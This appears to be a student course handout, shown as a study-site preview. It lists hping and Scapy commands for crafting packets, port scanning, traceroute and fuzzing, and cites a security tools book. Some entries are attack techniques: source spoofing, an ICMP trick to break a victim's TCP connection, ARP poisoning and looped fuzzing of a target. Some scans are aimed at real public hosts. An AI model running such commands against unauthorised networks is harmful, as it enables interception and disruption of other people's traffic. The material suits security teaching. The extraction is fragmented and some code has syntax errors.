PacketGenerator

PacketGenerator - Hping
...

Info iconThis preview shows page 1. Sign up to view the full content.

View Full Document Right Arrow Icon
This is the end of the preview. Sign up to access the rest of the document.

Unformatted text preview: Hping
 Generating
a
TCP
SYN
packet
 hping
­­syn
–p
80
www.usc.edu
 Sending
a
ping
from
a
fake
source
 hping
­­icmp
­C
0
­K
0
–a
192.168.1.1
192.168.1.10
 Break
an
established
TCP
IP
connection
 hping
­­icmp
­C
3
­K
1
­a
192.168.1.1
­­icmp­ipdst
update.microsoft.com
­­icmp­ ipsrc
victim
­­icmp­srcport
1034
­­icmp­dstport
80
victim
 Port
scanning
the
bored
way
 hping
www.usc.edu
­­syn
­p
79
 Press
CTRL‐Z
to
increment
the
port
number
 hping
­­scan
79­81
www.usc.edu
­S
 Listening
for
404
errors
 hping
­­listen
“404”
 Traceroute
over
TCP
on
port
80
 
 
 hping
­­traceroute
www.google.com
­­syn
–p
80
 
 Scappy
 Testing
a
network
stack
with
a
bad
packet
 >>>
IP(version=2,
ihl=3,
options=“love”,
proto=1)/TCP()
 Creating
an
implicit
packet
 >>>
pkts
=
IP(ttl=[1,3,5,(7,10)])/TCP()
 >>>
pkts
 >>>
[pkt
for
pkt
in
pkts]
 This
is
a
ping
scan
on
the
first
10
IPs
of
the
192.168.*.*
network
 
 >>> IP(dst=“192.168.*.1­10”)/ICMP()
 Do
a
TCP/SYN
scan
on
all
privilaged
ports
on
the
192.168.4.0/24
network
 
 >>> ▪IP(dst=“192.168.4.0/24”)/TCP(dport=(0,1024)
 
 
 Navigating
between
layers
 >>>
a=Ether()/IP()/TCP()
 >>>
a
 >>>
a.payload
 >>>
a.payload.payload
 Another
way
to
access
fields
in
Scapy
 >>>
a[IP]
 >>>
a[TCP]
 >>>
a[IP].dst
 A
TCP
SYN
scan
 >>>
sr(IP(dst=“192.168.5.1”)/TCP(dport=[(1,1024),3128,8080]))
 >>>
res,unans=_
 >>>
res.nsummary()
 Displaying
the
results
in
a
nicer
way
 >>>
res.nsummary(lfilter=lambda(s,r):
r[TCP].flags
&
2,
prn
=
 lambda(s,r):s.dport)
 Checking
Google
 >>>
res1,unans1=sr(IP(dst=“www.google.com”)/TCP(dport=[79,80]))
 >>>
res1.nsummary()
 Check
Slashdot
 >>>
res2,unans2=sr(IP(dst=“www.slashdot.org”/TCP(dport=[79,80]))
 >>>
res2.nsummary()
 ARP
Poisoning
#1
 >>>
sendp(Ether(dst=VICTIM.MAC)/ARP(op=“is­at”,
pdst=VICTIM.IP,
 hwdst=VICTIM.MAC,
psrc=ATK.IP,
hwsrc=ATK.MAC),
iface=“eth0”)
 ARP
Poisoning
#2
 >>>
sendp(Ether(dst=“ff:ff:ff:ff:ff:ff”)/ARP(pdst=VICTIM.IP,
psrc=ATK.IP,
 hwsrc=ATK.IP),
iface=“eth0”)
 
 
 Traceroute
with
Scapy
 >>>
res,unans=sr(IP(dst=“www.google.com”,
 ttl=(1,30))/TCP(sport=RandShort(),dport=80))
 >>>
res.make_table(lambda(s,r):
(s.dst,
s.ttl,
r.sprintf(“%IP.src%{TCP:
 %TCP.flags%}”)))
 Firewalking
 >>>res,unans=sr(IP(dst=TARGET,ttl=23)/TCP(dport=[22,23,25,113,80,443]),
 timeout=4,
retry=­2)
 >>>res.make_table(lambda(s,r):(s.dst,s.dport,r.sprintf(“{TCP:%TCP.flags%}{IC MP:%IP.src%#%r,ICMP.type%}”)))
 Fuzzing
Example
#1
 >>>
a=IP()/TCP()
 >>>
hexdump(a)
 >>>
b=fuzz(a)
 >>>
hexdump(b)
 >>>
ls(b)
 Fuzzing
Exmaple
#2
 >>>
send(fuzz(IP(dst=TARGET,
chksum(RandShort())/TCP(),loop=1)
 >>>
send(fuzz(IP(dst=TARGET),TCP()),
loop=1)
 >>>
send(fuzz(IP(dst=TARGET,
version=4,
chksum=RandShort())/TCP()),
 loop=1)
 
 Reference:
 Security
Power
tools
Ch.
6
 
 
 
 ...
View Full Document

This document was uploaded on 09/13/2010.

Ask a homework question - tutors are online